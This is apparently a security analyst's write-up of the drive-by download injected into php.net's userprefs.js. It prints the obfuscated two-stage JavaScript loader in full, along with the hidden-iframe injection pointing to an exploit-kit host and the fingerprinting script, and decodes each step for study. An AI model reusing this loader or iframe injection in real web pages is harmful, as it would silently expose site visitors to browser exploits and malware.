The drive-by download from php.net
The infection starts from a modified JavaScript file, userprefs.js, which was included from php.net/index.php. The following code had been appended to the end of that file:
// Stage 1: the loader appended to userprefs.js. An IIFE that receives `window`
// as Anv; its second argument (the SjB assignment at the bottom) is ignored by
// the function and exists only for the side effect of creating the global
// helper SjB. Every property name is hex-escaped so that nothing readable
// ("eval", "split", ...) appears in the file.
(function(Anv) {
// LUI holds the encrypted second stage (truncated here with "[...]").
var LUI = "M\xaa\xb0\xa9\xf5n-\x92\xe0\xb5S[...]",
// b2 = ["split", <Ud>, "length", "hasOwnProperty"]. The array literal doubles
// as a place to assign the implicit global Ud = (0x47 * 6) / 2 = 213 (0xd5);
// Ud is the bit mask of the character bits SjB leaves untouched. b2[1] itself
// is never read.
b2 = ["\x73\x70\x6c\x69\x74", Ud = (0x84 ^ 0xc3) * (0xf9 - 0xf3) / 2, "\x6c\x65\x6e\x67\x74\x68", "\x68\x61\x73\x4f\x77\x6e\x50\x72\x6f\x70\x65\x72\x74\x79"],
// VV: 24 bytes of encrypted key material.
VV = "\xc3\x9f\xae\x15\xf9\x928\xb4{\xcbV\x00D?GD|\x9f{:[\xa8\xd0\x9a",
// NQ = LUI.substring(0, VV.length): the first 24 bytes of LUI are the
// bootstrap key used to decrypt VV.
NQ = LUI["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, VV[b2[2]]);
// VDG(Av): decode Av one character at a time against the repeating key NQ,
// combining each char with NQ[GC % NQ.length] through SjB. Declared without
// `var`, so it becomes a global that the second stage can call; it closes over
// NQ, so the re-keying below affects every later call. The for...in over the
// split array is why the hasOwnProperty guard is needed.
VDG = function(Av) {
var sCV, j9, nB = j9 = "",
GC = 0;
Av = Av[b2[0]](nB); // Av.split("")
for (sCV in Av) {
if (Av[b2[3]](sCV)) { // Av.hasOwnProperty(sCV)
// NQ.split("")[GC %= NQ.length] is the key byte for this position
j9 += SjB(Av[sCV], NQ[b2[0]](nB)[GC %= NQ[b2[2]]]);
GC++;
}
}
return (j9);
};
// Re-key: decrypt VV with the bootstrap key; the result is the real key used
// for everything after this line, including all VDG("...") calls in stage 2.
NQ = VDG(VV);
// Decode the remainder of LUI (after the key prefix) and hand it to a window
// method whose 4-character name is decoded from "oVkD" -- almost certainly
// eval, given the length and the fact that stage 2 is executable code. The
// other two decoded names are 9 and 6 characters long, consistent with
// "substring" and "length", i.e. window.eval(VDG(LUI.substring(VV.length))).
Anv[VDG("oVkD")](VDG(LUI[VDG("yUh[|ZiLm")](VV[VDG("fEdO|@")])))
// SjB(uC, lp): combine plaintext character uC with key character lp. XN and
// OA are abused as scratch parameters to assemble "charCodeAt"/"fromCharCode".
})(window, SjB = function(uC, lp, XN, OA) {
uC = uC[XN = "\x63" + (OA = "\x68\x61\x72\x43\x6f\x64\x65") + "\x41\x74"](0); // uC.charCodeAt(0)
// String.fromCharCode( (bits of uC selected by Ud) | (the remaining bits,
// ~Ud & 0xff, XORed with the same bits of the key byte) ). Only a subset of
// bits is ever XORed, and which subset depends on the global Ud, which stage 2
// reassigns before decoding its own strings.
return (String["\x66\x72\x6f\x6d\x43" + OA](uC & Ud | ((uC & (~Ud & 0xff)) ^ (lp[XN](0) & (~Ud & 0xff)))))
});
This is a loader: it decrypts the remainder of the LUI string (everything after the 24-byte key prefix) with the helper VDG and passes the result to a window method whose decoded four-character name is almost certainly eval, so the second stage never appears in clear text in the file. Note that Ud, VDG and SjB are created as implicit globals, which the second stage relies on (and cleans up afterwards).
// Stage 2: what stage 1 decodes and executes. The random-looking comments on
// the next line are part of the sample; they look like filler (presumably to
// vary the bytes between copies) and have no effect.
/*IlcnDVqHsxH0yOFzDNP718Jyuru3K*/ /*87yjoFLgVnhk*/ /*fhcDLHyIuwbr2DEf3xXMo0*/
(function(dzI) {
// Change the bit mask used by SjB (0x0b * 2 = 22 = 0x16). Stage 2's strings
// were encrypted under this mask and the re-keyed NQ from stage 1, so they
// cannot be decoded with stage 1's mask alone.
Ud = 0x0b * (0xbb - 0xb9);
// eOa: build the hidden container. Decoded lookup tables (see the hand-decoded
// listing later in the write-up):
//   a = ["createElement","width","height","style","appendChild",
//        "getElementsByTagName","Math","overflow","position","left"]
//   b = ["document","floor","random","length","src"]
//   s = ["div","iframe"]
//   r = ["hidden","absolute","-10000px","http://url.whichusb.co.uk/stat.htm","10px"]
// t[] is scratch storage: t[0] div, t[1] div.style, t[2] iframe, t[3] iframe.style.
var eOa = (function(z) {
var a = [VDG("\xaa\xd3\xedH\xbd\xcdE\xcc,\x84%n4"), VDG("\xbe\xc8\xec]\xa1"), VDG("\xa1\xc4\xe1N\xa1\xdc"), VDG("\xba\xd5\xf1E\xac"), VDG("\xa8\xd1\xf8L\xa7\xccC\xc8\x20\x85$"), VDG("\xae\xc4\xfcl\xa5\xcdm\xc5'\x9d3B9U(/.\xe8$m"), VDG("\x84\xc0\xfcA"), VDG("\xa6\xd7\xed[\xaf\xc4o\xd7"), VDG("\xb9\xce\xfb@\xbd\xc1o\xce"), VDG("\xa5\xc4\xee]")],
b = [VDG("\xad\xce\xeb\\\xa4\xcdn\xd4"), VDG("\xaf\xcd\xe7F\xbb"), VDG("\xbb\xc0\xe6M\xa6\xc5"), VDG("\xa5\xc4\xe6N\xbd\xc0"), VDG("\xba\xd3\xeb")],
s = [VDG("\xad\xc8\xfe"), VDG("\xa0\xc7\xfaH\xa4\xcd")],
r = [VDG("\xa1\xc8\xecM\xac\xc6"), VDG("\xa8\xc3\xfbF\xa5\xddt\xc5"), VDG("\xe4\x90\xb8\x19\xf9\x98p\xd8"), VDG("\xa1\xd5\xfcY\xf3\x87/\xd5;\x85nw(h*\x20\x15\xfa+&*\xcf\xee\xd5\xa2\x8e\xfb]\xa8\xdc.\xc8=\x84"), VDG("\xf8\x91\xf8Q")],
t = [0, 0, 0, 0, 0];
// t[2] = document.createElement("iframe"); t[3] = its style (never used again)
t[3] = (t[2] = z[b[0]][a[0]](s[1]))[a[3]];
// iframe.src = r[3], the exploit-kit landing page
t[2][b[4]] = r[3];
// t[0] = document.createElement("div"); t[1] = its style; width = height = "10px"
(t[1] = (t[0] = z[b[0]][a[0]](s[0]))[a[3]])[a[1]] = t[1][a[2]] = r[4];
t[1][a[7]] = r[0]; // overflow = "hidden"
t[1][a[8]] = r[1]; // position = "absolute"
t[1][a[9]] = r[2]; // left = "-10000px"  (pushed off-screen, not display:none)
t[0][a[4]](t[2]); // div.appendChild(iframe)
return t[0];
})(dzI),
// The same ciphertexts as b[0], b[3], a[5] and a[6] above, i.e. document,
// "length", "getElementsByTagName" and Math. Note this outer `t` is the string
// "getElementsByTagName", unrelated to the scratch array t inside eOa.
d = dzI[VDG("\xad\xce\xeb\\\xa4\xcdn\xd4")],
i, b, l = VDG("\xa5\xc4\xe6N\xbd\xc0"),
t = VDG("\xae\xc4\xfcl\xa5\xcdm\xc5'\x9d3B9U(/.\xe8$m"),
m = dzI[VDG("\x84\xc0\xfcA")];
if (eOa) { // always truthy: eOa is the <div> returned above
// b = document.getElementsByTagName(<4-char name, presumably "body">)[0].
// If the page already has <div>s, append the container to one chosen with
// Math.floor(Math.random() * divs.length); otherwise append it to b. Picking
// a random existing div buries the injected node among legitimate content,
// so it is not simply the last child of <body>.
if (b = d[t](VDG("\xab\xce\xecP"))[0])((i = d[t](VDG("\xad\xc8\xfe")))[l] ? i[m[VDG("\xaf\xcd\xe7F\xbb")](m[VDG("\xbb\xc0\xe6M\xa6\xc5")]() * i[VDG("\xa5\xc4\xe6N\xbd\xc0")])] : b)[VDG("\xa8\xd1\xf8L\xa7\xccC\xc8\x20\x85$")](eOa);
// Fallback when that element does not exist yet: a 5-character document
// method called with a 9-character property of the container -- consistent
// with document.write(eOa.outerHTML), though neither name is decoded here.
else d[VDG("\xbe\xd3\xe1]\xac")](eOa[VDG("\xa6\xd4\xfcL\xbb\xe0T\xed\x05")]);
}
// Clean-up: SjB, VDG and Ud were created as implicit globals (assignment
// without var) in stage 1, so these deletes really remove them and leave no
// helper behind for later inspection of the window object.
delete SjB;
delete VDG;
delete Ud;
})(window);
Now that we have the code that performs the attack, we can see that it injects a hidden iframe into the page's DOM tree. Even though this is the decoded stage, it is still hard to read: every property name and string literal is itself encrypted and only decoded at runtime by VDG from the first stage, and the stage begins by reassigning the global Ud (which changes the bit mask SjB uses), so it cannot be decoded with the first stage's key alone.
By looking more closely at the “eOa” function we can decode it further into the following hand-written form:
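// Hand-decoded form of the stage-2 `eOa` builder. The obfuscated original
// reads every name through lookup tables; their decoded contents are:
//   a = ["createElement", "width", "height", "style", "appendChild",
//        "getElementsByTagName", "Math", "overflow", "position", "left"]
//   b = ["document", "floor", "random", "length", "src"]
//   s = ["div", "iframe"]
//   r = ["hidden", "absolute", "-10000px",
//        "http://url.whichusb.co.uk/stat.htm", "10px"]
//   t = [0, 0, 0, 0, 0]   (scratch: div, div.style, iframe, iframe.style)
//
// `z` is the window object the IIFE is invoked with.
// Returns a 10x10 px, overflow-hidden <div> positioned 10000 px off the left
// edge of the viewport, containing an <iframe> that loads the exploit-kit
// landing page. Nothing in it is visible to the user.
function eOa(z) {
  const iframeObj = z.document.createElement("iframe");
  // The original also stores iframeObj.style in t[3] but never uses it.
  iframeObj.src = "http://url.whichusb.co.uk/stat.htm";

  const divObj = z.document.createElement("div");
  const divStyleObj = divObj.style; // t[1] in the obfuscated source
  divStyleObj.width = divStyleObj.height = "10px";
  divStyleObj.overflow = "hidden";
  divStyleObj.position = "absolute";
  divStyleObj.left = "-10000px"; // off-screen, not display:none

  divObj.appendChild(iframeObj);
  return divObj;
}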
Now it is clear that the injected iframe is of the following form:
<div style="height: 10px; width: 10px; overflow: hidden; position: absolute; left: -10000px;"><iframe src="http://url.whichusb.co.uk/stat.htm"></iframe></div>
Note that the iframe itself is given no dimensions (so it renders at the browser's default size), but it is wrapped in a 10×10 px, overflow-hidden div positioned 10,000 px off the left edge of the viewport, so nothing is visible to the user; it is hidden by clipping and positioning, not by display:none. The page loaded in the iframe fingerprints the browser before any exploit is served.
// Fingerprinting script served in the hidden iframe. It probes the browser
// with the third-party PluginDetect library (not part of this listing) and
// submits the result through the page's first form. Every probe is wrapped in
// try/catch so that a missing or failing PluginDetect cannot stop the
// submission.
var os = 0;
try {
var os = PluginDetect.OS; // collected, but never included in the submitted id
} catch (e) {}
var jav = 0;
try {
// The real Java probe is commented out ...
//var javaversion=PluginDetect.getVersion('Java','./getjavainfo.jar');
// ... and replaced with a constant 0. Because 0 != null is true, jav is
// always 1: the "Java installed" flag carries no information (see the
// captured fingerprint below).
var javaversion = 0;
if (javaversion != null) {
jav = 1;
}
} catch (e) {}
// Declared but never read: the Adobe Reader result goes into pdfi instead.
var acrobat = new Object();
acrobat.installed = false;
acrobat.version = 0;
var pdfi = 0;
try {
// pdfi = 1 when PluginDetect reports a (non-null) Adobe Reader version.
var adobe = PluginDetect.getVersion("AdobeReader");
if (adobe != null) {
pdfi = 1;
}
} catch (e) {}
var resoluz = 0;
try {
resoluz = screen.width;
} catch (e) {}
document.write(''); // writes an empty string; purpose unclear, possibly a leftover
// Build "screen.width|jav|pdfi" (e.g. 800|1|1) and submit it via the `id`
// field of the first form; the form's action and method are outside this
// listing.
var id = resoluz + '|' + jav + '|' + pdfi;
var frm = document.forms[0];
frm.id.value = id;
frm.submit();
The resulting fingerprint captured on the wire was: id=800%7C1%7C1 (the %7C are the URL-encoded “|” separators).
This is “screen.width|java_enabled|pdf_enabled”, but the Java check is broken: the real PluginDetect call is commented out and javaversion is hard-coded to 0, and since 0 != null is true in JavaScript, jav is always 1. The “Java” flag therefore carries no information, which is why the captured fingerprint shows 1 regardless of whether Java is actually installed. It is also notable that the victim's screen width is sent to the server; a fixed, low resolution is one common heuristic for spotting analysis VMs, although the sample itself gives no direct evidence that this is why it is collected.
At this point a static HTML page containing multiple Java, Flash and Internet Explorer exploits is served to the victim. On closer inspection, the Internet Explorer exploit appears to target CVE-2013-2551.
Although I have seen this obfuscation technique before, I am interested in where it originates and whether there are tools that automatically rewrite the static function calls and array references (such as a[4] or b2[0] above) to their resulting values.